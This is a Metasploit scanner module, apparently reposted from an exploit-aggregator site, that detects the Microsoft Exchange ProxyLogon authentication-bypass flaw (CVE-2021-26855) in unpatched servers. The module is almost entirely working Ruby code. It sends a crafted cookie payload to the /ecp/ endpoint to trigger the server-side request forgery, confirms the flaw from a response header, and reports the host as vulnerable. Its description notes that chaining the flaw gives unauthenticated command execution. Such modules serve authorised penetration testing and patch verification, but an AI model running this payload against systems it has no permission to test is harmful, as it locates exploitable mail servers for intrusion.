Share
## https://sploitus.com/exploit?id=PACKETSTORM:181115
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
# begin auxiliary class  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Microsoft Exchange ProxyLogon Scanner',  
'Description' => %q{  
This module scan for a vulnerability on Microsoft Exchange Server that  
allows an attacker bypassing the authentication and impersonating as the  
admin (CVE-2021-26855).  
  
By chaining this bug with another post-auth arbitrary-file-write  
vulnerability to get code execution (CVE-2021-27065).  
  
As a result, an unauthenticated attacker can execute arbitrary commands on  
Microsoft Exchange Server.  
  
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,  
Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,  
Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).  
  
All components are vulnerable by default.  
},  
'Author' => [  
'Orange Tsai', # Discovery (Officially acknowledged by MSRC)  
'mekhalleh (RAMELLA Sébastien)' # Module author (Zeop Entreprise)  
],  
'References' => [  
['CVE', '2021-26855'],  
['LOGO', 'https://proxylogon.com/images/logo.jpg'],  
['URL', 'https://proxylogon.com/'],  
['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/']  
],  
'DisclosureDate' => '2021-03-02',  
'License' => MSF_LICENSE,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'Notes' => {  
'AKA' => ['ProxyLogon'],  
'Stability' => [CRASH_SAFE],  
'Reliability' => [],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options([  
OptEnum.new('METHOD', [true, 'HTTP Method to use for the check.', 'POST', ['GET', 'POST']])  
])  
end  
  
def message(msg)  
"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"  
end  
  
def run_host(target_host)  
@proto = (ssl ? 'https' : 'http')  
  
uri = normalize_uri('ecp', "#{Rex::Text.rand_text_alpha(1..3)}.js")  
received = send_request_cgi({  
'method' => datastore['METHOD'],  
'uri' => uri,  
'cookie' => 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'  
})  
unless received  
print_error(message('No response, target seems down.'))  
  
return Exploit::CheckCode::Unknown  
end  
  
if received && (received.code != 500 && received.code != 503)  
print_error(message('The target is not vulnerable to CVE-2021-26855.'))  
vprint_error("Obtained HTTP response code #{received.code} for #{full_uri(uri)}.")  
  
return Exploit::CheckCode::Safe  
end  
  
if received.headers['X-CalculatedBETarget'] != 'localhost'  
print_error(message('The target is not vulnerable to CVE-2021-26855.'))  
vprint_error('Could\'t obtain a correct \'X-CalculatedBETarget\' in the response header.')  
  
return Exploit::CheckCode::Safe  
end  
  
print_good(message('The target is vulnerable to CVE-2021-26855.'))  
msg = "Obtained HTTP response code #{received.code} for #{full_uri(uri)}."  
vprint_good(msg)  
  
report_vuln(  
host: target_host,  
name: name,  
refs: references,  
info: msg  
)  
  
Exploit::CheckCode::Vulnerable  
end  
end